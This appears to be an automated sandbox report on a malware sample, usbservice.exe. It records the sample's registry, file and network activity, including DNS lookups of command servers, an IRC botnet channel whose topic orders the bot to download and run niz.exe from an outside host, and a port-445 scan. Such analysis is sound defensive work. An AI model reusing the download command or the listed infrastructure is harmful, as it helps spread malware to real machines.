Key	Name	Value	Times
HKLM\SOFTWARE\CLASSES\AutoProxyTypes\Application/x-internet-signup	Default	0x00000000	1
HKLM\SOFTWARE\CLASSES\AutoProxyTypes\Application/x-internet-signup	DllFile	%SystemRoot%\system32\iedkcs32.dll	2
HKLM\SOFTWARE\CLASSES\AutoProxyTypes\Application/x-internet-signup	FileExtensions	.ins	2
HKLM\SOFTWARE\CLASSES\AutoProxyTypes\Application/x-ns-proxy-autoconfig	Default	0x01000000	1
HKLM\SOFTWARE\CLASSES\AutoProxyTypes\Application/x-ns-proxy-autoconfig	DllFile	%SystemRoot%\system32\jsproxy.dll	2
HKLM\SOFTWARE\CLASSES\AutoProxyTypes\Application/x-ns-proxy-autoconfig	FileExtensions	.pac;.jvs;.js	2
HKLM\SOFTWARE\CLASSES\AutoProxyTypes\Application/x-ns-proxy-autoconfig	Flags	0x01000000	1
HKLM\SOFTWARE\Microsoft\ESENT\Global\DEBUG	Trace Level		2
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	EnablePunycode	1	1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	UrlEncoding	0x00000000	2
HKLM\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Shell Extensions	GON	C:\sample.exe	2
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager	CriticalSectionTimeout	2592000	1
HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Linkage	Export	0x5c004400650076006900630065005c004e0065007400420054005f005400	1
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Linkage	Bind	0x5c004400650076006900630065005c007b00420032004200350031003000	8
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{B2B51064-BBF5-4528-B62B-E6D62A782874}	DhcpServer	255.255.255.255	4
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{B2B51064-BBF5-4528-B62B-E6D62A782874}	Domain		2
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{B2B51064-BBF5-4528-B62B-E6D62A782874}	EnableDHCP	0	2
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{B2B51064-BBF5-4528-B62B-E6D62A782874}	NameServer	192.168.0.1	4
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{B2B51064-BBF5-4528-B62B-E6D62A782874}	RegisterAdapterName	0	2
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{B2B51064-BBF5-4528-B62B-E6D62A782874}	RegistrationEnabled	1	2
HKLM\SYSTEM\CurrentControlSet\Services\Winsock\Parameters	Transports	0x5400630070006900700000004e0065007400420049004f00530000000000	2
HKLM\SYSTEM\Setup	OsLoaderPath	\	2
HKLM\SYSTEM\Setup	SystemPartition	\Device\HarddiskVolume1	2
HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BEHAVIORS	*	1	1
HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_MK_PROTOCOL	*	1	1
HKLM\Software\Microsoft\Rpc\SecurityService	10	secur32.dll	1
HKLM\Software\Microsoft\Tracing	EnableConsoleTracing	0	1
HKLM\Software\Microsoft\Tracing\RASAPI32	ConsoleTracingMask	4294901760	3
HKLM\Software\Microsoft\Tracing\RASAPI32	EnableConsoleTracing	0	3
HKLM\Software\Microsoft\Tracing\RASAPI32	EnableFileTracing	0	3
HKLM\Software\Microsoft\Tracing\RASAPI32	FileDirectory	%windir%\tracing	6
HKLM\Software\Microsoft\Tracing\RASAPI32	FileTracingMask	4294901760	3
HKLM\Software\Microsoft\Tracing\RASAPI32	MaxFileSize	1048576	3
HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList	AllUsersProfile	All Users	6
HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList	DefaultUserProfile	Default User	6
HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList	ProfilesDirectory	%SystemDrive%\Documents and Settings	12
HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18	ProfileImagePath	%systemroot%\system32\config\systemprofile	6
HKLM\Software\Microsoft\Windows\CurrentVersion	CommonFilesDir	C:\Program Files\Common Files	6
HKLM\Software\Microsoft\Windows\CurrentVersion	DevicePath	%SystemRoot%\inf	1
HKLM\Software\Microsoft\Windows\CurrentVersion	ProgramFilesDir	C:\Program Files	6
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders	Common AppData	%ALLUSERSPROFILE%\Application Data	1
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\\msn.com			1
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\\msn.com\related	http	4	1
HKLM\Software\Microsoft\Windows\CurrentVersion\Setup	DriverCachePath	%SystemRoot%\Driver Cache	2
HKLM\Software\Microsoft\Windows\CurrentVersion\Setup	LogLevel	0	2
HKLM\Software\Microsoft\Windows\CurrentVersion\Setup	ServicePackCachePath	c:\windows\ServicePackFiles\ServicePackCache	2
HKLM\Software\Microsoft\Windows\CurrentVersion\Setup	ServicePackSourcePath	c:\windows\ServicePackFiles	2
HKLM\Software\Microsoft\Windows\CurrentVersion\Setup	SourcePath	D:\	2
HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName	ComputerName	USER	10
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\digest.dll	Capabilities	16464	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\digest.dll	Comment	Digest SSPI Authentication Package	2
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\digest.dll	Name	Digest	2
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\digest.dll	RpcId	65535	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\digest.dll	TokenSize	65535	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\digest.dll	Type	49	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\digest.dll	Version	1	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msapsspc.dll	Capabilities	55	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msapsspc.dll	Comment	DPA Security Package	2
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msapsspc.dll	Name	DPA	2
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msapsspc.dll	RpcId	17	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msapsspc.dll	TokenSize	768	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msapsspc.dll	Type	49	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msapsspc.dll	Version	1	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msnsspc.dll	Capabilities	55	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msnsspc.dll	Comment	MSN Security Package	2
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msnsspc.dll	Name	MSN	2
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msnsspc.dll	RpcId	18	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msnsspc.dll	TokenSize	768	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msnsspc.dll	Type	49	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msnsspc.dll	Version	1	1
HKLM\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm	wheel	1	1
HKLM\System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{B2B51064-BBF5-4528-B62B-E6D62A782874}\Connection	Name	Local Area Connection	2
HKLM\System\CurrentControlSet\Control\ProductOptions	ProductType	WinNT	1
HKLM\System\CurrentControlSet\Control\SecurityProviders	SecurityProviders	msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll	2
HKLM\System\CurrentControlSet\Control\SecurityProviders\SaslProfiles	GSSAPI	Kerberos	1
HKLM\System\CurrentControlSet\Control\ServiceCurrent		9	1
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	ComSpec	%SystemRoot%\system32\cmd.exe	12
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	FP_NO_HOST_CHECK	NO	12
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	NUMBER_OF_PROCESSORS	1	12
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	OS	Windows_NT	12
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	PATHEXT	.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH	12
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	PROCESSOR_ARCHITECTURE	x86	12
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	PROCESSOR_IDENTIFIER	x86 Family 6 Model 3 Stepping 3, GenuineIntel	12
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	PROCESSOR_LEVEL	6	12
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	PROCESSOR_REVISION	0303	12
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	Path	%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem	12
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	TEMP	%SystemRoot%\TEMP	12
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	TMP	%SystemRoot%\TEMP	12
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	windir	%SystemRoot%	12
HKLM\System\CurrentControlSet\Services\LDAP	LdapClientIntegrity	1	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters	Domain		15
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters	Hostname	user	15
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters	UseDomainNameDevolution	1	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	HelperDllName	%SystemRoot%\System32\wshtcpip.dll	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	Mapping	0x0b0000000300000002000000010000000600000002000000010000000000	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	MaxSockaddrLength	16	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	MinSockaddrLength	16	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	UseDelayedAcceptance	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters	WinSock_Registry_Version	2.0	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5	Num_Catalog_Entries	3	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5	Serial_Access_Num	4	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	DisplayString	Tcpip	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	Enabled	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	LibraryPath	%SystemRoot%\System32\mswsock.dll	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	ProviderId	0x409d05229e7ecf11ae5a00aa00a7112b	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	StoresServiceClassInfo	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	SupportedNameSpace	12	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	Version	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	DisplayString	NTDS	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	Enabled	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	LibraryPath	%SystemRoot%\System32\winrnr.dll	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	ProviderId	0xee37263b80e5cf11a55500c04fd8d4ac	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	StoresServiceClassInfo	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	SupportedNameSpace	32	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	Version	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	DisplayString	Network Location Awareness (NLA) Namespace	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	Enabled	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	LibraryPath	%SystemRoot%\System32\mswsock.dll	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	ProviderId	0x3a244266a83ba64abaa52e0bd71fdd83	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	StoresServiceClassInfo	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	SupportedNameSpace	15	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	Version	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	Next_Catalog_Entry_ID	1012	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	Num_Catalog_Entries	11	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	Serial_Access_Num	4	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004	PackedCatalogItem	%SystemRoot%\system32\rsvpsp.d	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005	PackedCatalogItem	%SystemRoot%\system32\rsvpsp.d	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\Setup	SystemSetupInProgress	0	4
HKLM\System\WPA\PnP	seed	1374283966	1
HKU\S-1-5-18\Control Panel\International	Locale	00000409	1
HKU\S-1-5-18\Control Panel\International	iCalendarType	1	1
HKU\S-1-5-18\Environment	TEMP	%USERPROFILE%\Local Settings\Temp	12
HKU\S-1-5-18\Environment	TMP	%USERPROFILE%\Local Settings\Temp	12
HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	EnableNegotiate	1	1
HKU\S-1-5-18\Software\Microsoft\Windows NT\CurrentVersion\Winlogon	ParseAutoexec	1	6
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders	AppData	%USERPROFILE%\Application Data	5
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders	Cache	%USERPROFILE%\Local Settings\Temporary Internet Files	1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders	Cookies	%USERPROFILE%\Cookies	1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders	History	%USERPROFILE%\Local Settings\History	1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders	Local Settings	%USERPROFILE%\Local Settings	1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders	Personal	%USERPROFILE%\My Documents	1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache	Signature	Client UrlCache MMF Ver 5.2	2
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content	CacheLimit	163410	1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content	CachePrefix		2
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content	PerUserItem	1	1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies	CacheLimit	8192	1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies	CachePrefix	Cookie:	2
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies	PerUserItem	1	1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012008033120080401	CacheLimit	8192	1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012008033120080401	CacheOptions	11	1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012008033120080401	CachePath	%USERPROFILE%\Local Settings\History\History.IE5\MSHist012008033120080401	2
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012008033120080401	CachePrefix	:2008033120080401:	2
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012008033120080401	CacheRepair	0	1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History	CacheLimit	8192	1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History	CachePrefix	Visited:	2
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History	PerUserItem	1	1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	AutoDetect	0	1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	IntranetName	1	1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ProxyBypass	1	1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProtocolDefaults\			1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProtocolDefaults\	@ivt	1	1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProtocolDefaults\	file	3	1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProtocolDefaults\	ftp	3	1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProtocolDefaults\	http	3	1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProtocolDefaults\	https	3	1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProtocolDefaults\	shell	0	1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0	Flags	33	2
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1	Flags	219	2
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2	Flags	71	2
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3	1A10	1	1
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3	Flags	1	2
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4	Flags	3	2
HKU\S-1-5-18\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	SavedLegacySettings	0x3c0000000200000009000000000000000000000000000000000000000000	2

	- Monitored Registry Keys:

Key Name	Watch subtree	Notify Filter	Count
HKLM\Software\Microsoft\Tracing\RASAPI32	0	Attributes Change,Value Change,Security Descriptor Change	3
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5	0	Key Change	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	0	Key Change	1
HKLM\system\CurrentControlSet\control\NetworkProvider\HwOrder	0	Value Change	1

6.b) usbservice.exe - File Activities

	- Files Deleted:

C:\sample.exe

	- Files Created:

C:\nizx.exe

	- Files Read:

PIPE\ROUTER

PIPE\lsarpc

c:\autoexec.bat

pipe\net\NtControlPipe9

	- Files Modified:

C:\nizx.exe

PIPE\ROUTER

PIPE\lsarpc

WMIDataDevice

\Device\Afd\AsyncConnectHlp

\Device\Afd\Endpoint

\Device\Ip

\Device\NetBT_Tcpip_{B2B51064-BBF5-4528-B62B-E6D62A782874}

\Device\RasAcd

\Device\Tcp

pipe\net\NtControlPipe9

	- File System Control Communication:

File	Control Code	Times
\DosDevices\pipe\	0x00110018	1
PIPE\lsarpc	0x0011C017	44
PIPE\ROUTER	0x0011C017	3

	- Device Control Communication:

File	Control Code	Times
WMIDataDevice	0x0022414C	5
WMIDataDevice	0x00228144	5
\Device\Tcp	0x00120003	48
\Device\KsecDD	0x00390008	8
\Device\RasAcd	0x00F14014	2
\Device\Afd\Endpoint	AFD_GET_INFO (0x0001207B)	2
\Device\Afd\Endpoint	AFD_SET_CONTEXT (0x00012047)	912
\Device\Afd\Endpoint	AFD_SET_INFO (0x0001203B)	176
\Device\Afd\Endpoint	AFD_BIND (0x00012003)	349
\Device\Afd\Endpoint	AFD_GET_TDI_HANDLES (0x00012037)	696
\Device\Afd\Endpoint	AFD_START_LISTEN (0x0001200B)	1
\Device\Afd\Endpoint	AFD_GET_SOCK_NAME (0x0001202F)	3
\Device\Afd\AsyncConnectHlp	AFD_CONNECT (0x00012007)	175
\Device\Afd\Endpoint	AFD_SELECT (0x00012024)	185
\Device\Afd\Endpoint	AFD_CONNECT (0x00012007)	173
\Device\Afd\Endpoint	AFD_SEND (0x0001201F)	356
\Device\Afd\Endpoint	AFD_RECV (0x00012017)	351
C:\Endpoint	AFD_SET_INFO (0x0001203B)	1
C:\Endpoint	AFD_BIND (0x00012003)	3
C:\Endpoint	AFD_SET_CONTEXT (0x00012047)	5
C:\Endpoint	AFD_GET_TDI_HANDLES (0x00012037)	6
C:\Endpoint	AFD_SELECT (0x00012024)	1
\Device\Ip	0x00120040	6
\Device\Ip	0x00120090	2
\Device\NetBT_Tcpip_{B2B51064-BBF5-4528-B62B-E6D62A782874}	0x0021009A	2
\Device\Ip	0x00120054	4
\Device\Ip	0x0012006C	2
\Device\NetBT_Tcpip_{B2B51064-BBF5-4528-B62B-E6D62A782874}	0x00210096	1
C:\Endpoint	AFD_CONNECT (0x00012007)	2
C:\Endpoint	AFD_SEND (0x0001201F)	4
C:\Endpoint	AFD_RECV (0x00012017)	4
unnamed file	0x00120028	2

	- Memory Mapped Files:

File Name

C:\WINDOWS\System32\mswsock.dll

C:\WINDOWS\System32\winrnr.dll

C:\WINDOWS\System32\wshtcpip.dll

C:\WINDOWS\WindowsShell.Manifest

C:\WINDOWS\system32\ACTIVEDS.dll

C:\WINDOWS\system32\ATL.DLL

C:\WINDOWS\system32\DHCPCSVC.DLL

C:\WINDOWS\system32\ESENT.dll

C:\WINDOWS\system32\EapolQec.dll

C:\WINDOWS\system32\MPRAPI.dll

C:\WINDOWS\system32\MSVCP60.dll

C:\WINDOWS\system32\OneX.DLL

C:\WINDOWS\system32\QUtil.dll

C:\WINDOWS\system32\RASAPI32.dll

C:\WINDOWS\system32\SAMLIB.dll

C:\WINDOWS\system32\SETUPAPI.dll

C:\WINDOWS\system32\TAPI32.dll

C:\WINDOWS\system32\WINMM.dll

C:\WINDOWS\system32\WINSTA.dll

C:\WINDOWS\system32\WMI.dll

C:\WINDOWS\system32\WTSAPI32.dll

C:\WINDOWS\system32\WZCSAPI.DLL

C:\WINDOWS\system32\WZCSvc.DLL

C:\WINDOWS\system32\adsldpc.dll

C:\WINDOWS\system32\credui.dll

C:\WINDOWS\system32\dnsapi.dll

C:\WINDOWS\system32\dot3api.dll

C:\WINDOWS\system32\dot3dlg.dll

C:\WINDOWS\system32\eappcfg.dll

C:\WINDOWS\system32\eappprxy.dll

C:\WINDOWS\system32\en-US\wininet.dll.mui

C:\WINDOWS\system32\hnetcfg.dll

C:\WINDOWS\system32\icmp.dll

C:\WINDOWS\system32\iphlpapi.dll

C:\WINDOWS\system32\msv1_0.dll

C:\WINDOWS\system32\netman.dll

C:\WINDOWS\system32\netshell.dll

C:\WINDOWS\system32\odbc32.dll

C:\WINDOWS\system32\odbcint.dll

C:\WINDOWS\system32\psapi.dll

C:\WINDOWS\system32\rasadhlp.dll

C:\WINDOWS\system32\rasman.dll

C:\WINDOWS\system32\rtutils.dll

C:\WINDOWS\system32\sensapi.dll

6.c) usbservice.exe - Windows Service Activities

	- Services Started:

RASMAN

6.d) usbservice.exe - Process Activities

	- Thread Overview:

Time	Number of threads
After 91 seconds	1
After 238 seconds	0

6.e) usbservice.exe - Network Activity

	- DNS Queries:

Name	Query Type	Query Result	Successful	Protocol
server1.unibaq.com	DNS_TYPE_A	94.75.208.172	1
wpad	DNS_TYPE_A		0
imagecake.cn	DNS_TYPE_A	206.53.62.146	1

	- Opened Listening Ports:

Port	Type
2770	tcp

	- HTTP Conversations:

From ANUBIS:1322 to 206.53.62.146:80 - [imagecake.cn]
Request: GET /niz.exe
Response: 404 "Not Found"

	- IRC Conversations:

From ANUBIS:1131 to 94.75.208.172:47221

Nick: [00|USA|XP|762938]

Username: SP3-709

Joined Channel: #ms08-67

Channel Topic for Channel #ms08-67: "-ip.wget -S|-ip.wget http://imagecake.cn/niz.exe C:\nizx.exe 1"

Private Message to Channel #ms08-67: "^C04dl^C Created: "C:\nizx.exe", PID: <1780>"

Private Message to Channel #ms08-67: "^C04dl^C dl: 0.5KB to: C:\nizx.exe @ 0.5KB/sec."

	- TCP Scans:

260 IPs on Port 445

192.0.0.0/16

Analysis Report for 647a10168f2ab6afbbe28fc59926f99e

Summary:

Table of Contents